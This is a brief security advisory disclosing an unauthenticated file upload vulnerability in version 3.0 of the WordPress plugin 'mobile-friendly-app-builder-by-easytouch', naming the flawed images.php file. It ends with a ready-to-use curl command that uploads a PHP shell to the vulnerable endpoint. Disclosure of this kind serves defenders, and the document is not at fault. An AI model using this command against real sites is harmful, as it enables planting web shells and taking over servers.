Title:Unrestricted File Upload vulnerability in Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0
The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/

The code in file ./mobile-friendly-app-builder-by-easytouch/server/images.php doesn't require authentication or check that the user is allowed to upload content.

It also doesn't sanitize the file upload against executable code.

See:
https://plugins.svn.wordpress.org/mobile-friendly-app-builder-by-easytouch/trunk/server/images.php$ curl   -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php"